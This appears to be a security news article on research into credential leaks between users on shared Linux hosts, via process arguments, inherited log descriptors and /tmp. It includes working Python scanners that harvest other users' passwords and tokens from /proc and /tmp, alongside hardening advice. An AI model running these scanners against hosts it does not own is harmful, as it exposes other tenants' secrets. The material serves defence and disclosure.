Research has documented a significant weakness in multi-user Linux environments: standard, documented system behaviours, none of them bugs in their own right, can be exploited to harvest credentials and secrets belonging to other users on the same host.
The research, presented in “Silent Leaks: Harvesting Secrets from Shared Linux Environments,” demonstrates how legitimate system tools become weapons for reconnaissance in shared hosting environments.
The attack methodology leverages fundamental Linux transparency features that were originally designed for trusted multi-user environments like universities and shared laboratories.
Those environments prioritise debugging and monitoring over strict inter-user isolation, so an attacker can gather intelligence with nothing more than ordinary unprivileged commands, none of which triggers a traditional security alert.
Key Takeaways
1. ps auxww and /proc/[pid]/cmdline expose live passwords and API keys from other users' processes.
2. CageFS and chroot isolation can be bypassed through hosting-panel binaries that run outside the jail, and a LiteSpeed stderr.log shared between tenants can be read through /proc/self/fd/2.
3. /tmp directory surveillance captures sensitive files containing credentials and secrets.
Process Information Exploitation
The primary attack vector exploits the default visibility of process arguments: commands such as ps auxww simply read /proc/[pid]/cmdline, and unless /proc is mounted with hidepid that file is readable by every user on the system for every process, whoever owns it.
Ionut Cernica’s research shows how attackers can continuously monitor these process lists to capture real-time credential exposures.
Real-world examples from the research include database credentials leaked through WordPress CLI (wp-cli) operations, and system administration commands that expose sensitive information during user creation and database operations.
The researcher documented cases where administrative passwords, API keys, and database credentials were visible to any user able to run a basic process-listing command.
That includes root-level operations: the argument list of a root-owned process is just as readable to an ordinary user as any other, so privileged maintenance jobs that pass a secret on the command line leak it to every tenant for as long as they run.
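The visibility described above, as an added example that is not part of the research or its tooling: a small scanner that reads /proc/<pid>/cmdline the way ps does and flags arguments that carry a secret. The flag lists, the regular expressions and the sample command lines are constructed here to match the tools the article names (wp-cli, mysql, useradd); the matching is heuristic and tuned to those tools.

```python
"""Added example: what a tenant on a shared host sees in other users' argv.
Parses /proc/<pid>/cmdline (the same data `ps auxww` prints) and flags
arguments that carry credentials. Not code from the Silent Leaks research;
the sample command lines below are constructed."""
from __future__ import annotations
import os
import re
from typing import Iterable, Iterator

# Long options whose value is a secret, given as --flag=value or --flag value.
SECRET_FLAGS = {
    "--password", "--passwd", "--dbpass", "--db-password", "--admin-password",
    "--admin_password", "--token", "--api-key", "--api_key", "--secret",
}
# Tools that take the secret glued to -p (mysql -pSECRET, getopt-style tools too).
SHORT_P_GLUED = {"mysql", "mysqldump", "mysqladmin", "mariadb", "useradd", "usermod", "sshpass"}
# Tools that take the secret as the argument after -p (useradd -p HASH).
# mysql is deliberately absent: a bare `mysql -p` prompts, so the next arg is not a secret.
SHORT_P_SEPARATE = {"useradd", "usermod", "sshpass"}
# Credentials embedded in connection URLs: scheme://user:pass@host/...
URL_CRED_RE = re.compile(r"^[a-z][a-z0-9+.-]*://[^/:@\s]+:([^@\s]+)@")
# Bearer/basic tokens passed as a literal header (curl -H "Authorization: ...").
AUTH_HDR_RE = re.compile(r"^authorization:\s*(?:bearer|basic|token)\s+(\S+)$", re.I)


def parse_cmdline(raw: bytes) -> list[str]:
    """/proc/<pid>/cmdline stores argv NUL-separated with a trailing NUL."""
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def find_secrets(argv: list[str]) -> list[tuple[str, str]]:
    """Return (where, secret) pairs found in one argument vector."""
    hits: list[tuple[str, str]] = []
    tool = os.path.basename(argv[0]) if argv else ""
    i = 0
    while i < len(argv):
        arg = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        flag, _, inline = arg.partition("=")
        if flag in SECRET_FLAGS and inline:
            hits.append((flag, inline))
        elif arg in SECRET_FLAGS and nxt is not None and not nxt.startswith("-"):
            hits.append((arg, nxt))
            i += 1
        elif tool in SHORT_P_GLUED and arg.startswith("-p") and len(arg) > 2:
            hits.append(("-p", arg[2:]))
        elif tool in SHORT_P_SEPARATE and arg == "-p" and nxt is not None and not nxt.startswith("-"):
            hits.append(("-p", nxt))
            i += 1
        else:
            m = URL_CRED_RE.match(arg) or AUTH_HDR_RE.match(arg)
            if m:
                hits.append(("embedded", m.group(1)))
        i += 1
    return hits


def iter_proc_cmdlines(proc_root: str = "/proc") -> Iterator[tuple[int, list[str]]]:
    """Yield (pid, argv) for every process whose cmdline is readable. Without
    hidepid on /proc that is every process on the box, which is the leak."""
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, name, "cmdline"), "rb") as f:
                argv = parse_cmdline(f.read())
        except OSError:  # raced with process exit, or hidepid=2 hides it
            continue
        if argv:
            yield int(name), argv


def scan_cmdlines(cmdlines: Iterable[tuple[int, list[str]]]) -> list[tuple[int, str, str, str]]:
    """(pid, tool, where, secret) for every hit; pass iter_proc_cmdlines() for a live scan."""
    return [(pid, argv[0], where, secret)
            for pid, argv in cmdlines
            for where, secret in find_secrets(argv)]


# Constructed samples, in the exact byte form /proc/<pid>/cmdline stores them.
SAMPLE_CMDLINES = {
    101: b"wp\0config\0create\0--dbname=site\0--dbuser=site\0--dbpass=Wp$ecret1\0",
    102: b"mysql\0-u\0root\0-pR00tPassw0rd\0shop\0",
    103: b"useradd\0-m\0-p\0$6$salt$hash\0newuser\0",
    104: b"curl\0-H\0Authorization: Bearer eyJhbGci...\0https://api.example/v1\0",
    105: b"pg_dump\0postgres://app:DbPass42@db.internal/app\0",
    106: b"php\0artisan\0queue:work\0",
}


def scan_samples() -> list[tuple[int, str, str, str]]:
    return scan_cmdlines((pid, parse_cmdline(raw)) for pid, raw in sorted(SAMPLE_CMDLINES.items()))


if __name__ == "__main__":
    live = scan_cmdlines(iter_proc_cmdlines()) if os.path.isdir("/proc") else []
    for pid, tool, where, secret in scan_samples() + live:
        print(f"pid {pid} {tool}: {where} -> {secret[:4]}***")
```

Run as any unprivileged user on a host without hidepid, the live scan returns the same kind of hits for real processes. Two checks follow from it. `findmnt -o OPTIONS /proc` shows whether hidepid is set; `mount -o remount,hidepid=2 /proc` (or `hidepid=2` on the proc line in /etc/fstab) makes unprivileged users see only their own /proc entries. On the writing side, secrets should leave argv altogether: `mysql --defaults-extra-file=<0600 file>` instead of -p, `chpasswd` fed on stdin instead of `useradd -p`, and tokens in an environment variable or a file rather than a literal header (/proc/[pid]/environ, unlike cmdline, is readable only by the process owner). hidepid does nothing for /tmp or for descriptors a process inherits.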
Bypassing Isolation Systems and Exploiting Temporary Files
Even in environments protected by isolation systems like CageFS and chroot jails, Cernica successfully demonstrated escape techniques.
One notable case involved exploiting a hosting panel binary that inadvertently ran outside the CageFS environment, providing access to the real host system.
The research also highlighted LiteSpeed web server configurations in which a script's inherited standard-error descriptor pointed at a stderr.log shared by all tenants; reading that descriptor back through /proc/self/fd/2 exposed, in real time, the error output of other users' scripts.
This included PayPal API tokens and session cookies.
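The descriptor re-open described above, as an added example that is not the research's own code and is not specific to LiteSpeed: one process opens a shared stderr.log for append, installs it as fd 2 the way a web server does for a CGI or PHP child, and a reader recovers the whole log through /proc/self/fd/2 without ever naming its path. Linux only; the log line is constructed.

```python
"""Added example: an inherited standard-error descriptor is enough to read the
log it points at, with no usable path to that log. Linux only (uses /proc/self/fd).
Not code from the Silent Leaks research; the log line is constructed."""
from __future__ import annotations
import os
import tempfile


def describe_fds() -> dict[int, str]:
    """Map each open descriptor of this process to its target, as
    `ls -l /proc/self/fd` shows. From a CGI or PHP script this is the first
    check: which files did the web server hand me?"""
    fds: dict[int, str] = {}
    for name in os.listdir("/proc/self/fd"):
        try:
            fds[int(name)] = os.readlink(f"/proc/self/fd/{name}")
        except OSError:  # the listing's own descriptor closes under us
            continue
    return fds


def read_through_fd(fd: int) -> str:
    """Reopen whatever fd points at, read-only, via its /proc magic link.
    The kernel applies the file's own mode bits to this new open, not the
    permissions of the directories on the path, so a write-only, append-only
    stderr descriptor into a 0644 log turns into a readable one."""
    with open(f"/proc/self/fd/{fd}", "rb") as f:
        return f.read().decode("utf-8", "replace")


def demo() -> tuple[str, str]:
    """Reproduce the shape of the finding in one process: a shared stderr.log
    is opened for append and installed as fd 2, a script writes an error line
    carrying a token into it, and a reader pulls the whole log back via fd 2."""
    with tempfile.TemporaryDirectory() as d:
        log = os.path.join(d, "stderr.log")
        log_fd = os.open(log, os.O_WRONLY | os.O_APPEND | os.O_CREAT, 0o644)
        saved_stderr = os.dup(2)
        try:
            os.dup2(log_fd, 2)      # what the server's child inherits
            os.close(log_fd)
            # constructed: the kind of line another tenant's script leaves behind
            os.write(2, b"PHP Fatal error: PayPal request failed, access_token=A21AAxx...\n")
            target = os.readlink("/proc/self/fd/2")
            content = read_through_fd(2)
        finally:
            os.dup2(saved_stderr, 2)  # put our real stderr back
            os.close(saved_stderr)
        return os.path.basename(target), content


if __name__ == "__main__":
    for fd, target in sorted(describe_fds().items()):
        print(f"fd {fd} -> {target}")
    print(demo())
```

The tenant-side check is the `describe_fds` listing: if fd 2, or any other inherited descriptor, resolves to a file outside your own space and that file's mode grants you read, the log is readable regardless of the directory permissions above it. The server-side fix is a per-vhost error log, or an error log whose mode the child's user cannot read (the inherited descriptor still lets the child write to it, but the re-open through /proc fails the mode check).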
Temporary file monitoring presents another significant threat vector. A script that polls a shared /tmp can capture files other users drop there, including SQL dumps, configuration files, and installation logs containing administrative passwords, whenever those files are created world-readable, as the usual default umask of 022 makes them.
The researcher documented cases where installation logs exposed critical system credentials.
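The /tmp sweep described above, as an added example that is not code from the research: a scanner over a shared directory that reports only files another user could actually read, beside the writer-side fix. The regular expression, file names and sample contents are constructed for the demonstration.

```python
"""Added example: sweep a shared temp directory for files other tenants can
read that look like they carry credentials, next to the writer-side fix.
Not code from the Silent Leaks research; file contents are constructed."""
from __future__ import annotations
import os
import re
import stat
import tempfile

# key=value / key: value lines whose key looks like a credential
SECRET_RE = re.compile(rb"(passw(or)?d|api[_-]?key|secret|token)\s*[=:]\s*\S+", re.I)


def world_readable(path: str) -> bool:
    """Regular file with the other-read bit set; symlinks and directories are skipped."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IROTH)


def scan_shared_dir(root: str, max_bytes: int = 1 << 20) -> list[tuple[str, str]]:
    """Return (path, first matching line) for each world-readable regular file
    under root whose first max_bytes match SECRET_RE. This is one pass of what
    a polling watcher over /tmp does; an attacker loops it with a short sleep."""
    hits: list[tuple[str, str]] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                if not world_readable(p):
                    continue
                with open(p, "rb") as f:
                    data = f.read(max_bytes)
            except OSError:  # vanished or unreadable after all
                continue
            for line in data.splitlines():
                if SECRET_RE.search(line):
                    hits.append((p, line.decode("utf-8", "replace")))
                    break
    return hits


def write_install_log_leaky(root: str, admin_pw: str) -> str:
    """What a careless installer does: a fixed name and the default umask (022),
    which yields mode 0644. chmod here only makes that default explicit."""
    p = os.path.join(root, "install.log")
    with open(p, "w") as f:
        f.write(f"Creating admin user\nadmin_password={admin_pw}\n")
    os.chmod(p, 0o644)
    return p


def write_install_log_private(root: str, admin_pw: str) -> str:
    """The fix: create the file owner-only (0600) and unpredictable from the
    first instant, instead of tightening permissions after a readable window."""
    fd, p = tempfile.mkstemp(prefix="install.", suffix=".log", dir=root)
    with os.fdopen(fd, "w") as f:
        f.write(f"Creating admin user\nadmin_password={admin_pw}\n")
    return p


def demo() -> list[tuple[str, str]]:
    """Constructed shared directory: one leaky log, one private log, one benign file."""
    with tempfile.TemporaryDirectory() as root:
        write_install_log_leaky(root, "Adm1nPass!")
        write_install_log_private(root, "Adm1nPass!")
        notes = os.path.join(root, "notes.txt")
        with open(notes, "w") as f:
            f.write("nothing to see here\n")
        os.chmod(notes, 0o644)
        return [(os.path.basename(p), line) for p, line in scan_shared_dir(root)]


if __name__ == "__main__":
    print(demo())
    if os.path.isdir("/tmp"):
        for p, line in scan_shared_dir("/tmp"):
            print(f"{p}: {line[:40]}")
```

The defensive check is the same scan run against the real /tmp, or simply `find /tmp -type f -perm -o=r` from any account. PrivateTmp=yes in a systemd unit or a per-user /tmp under a CageFS-style jail removes the shared directory altogether; where that is not possible, installers and dump scripts should run under `umask 077` or create files with mkstemp, as above, rather than chmod them after the fact.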
The implications extend beyond traditional hosting providers to development servers, educational laboratories, VPS environments, and CTF infrastructure.
Cernica responsibly disclosed these vulnerabilities to major hosting platforms in April, with fixes currently in progress across affected systems.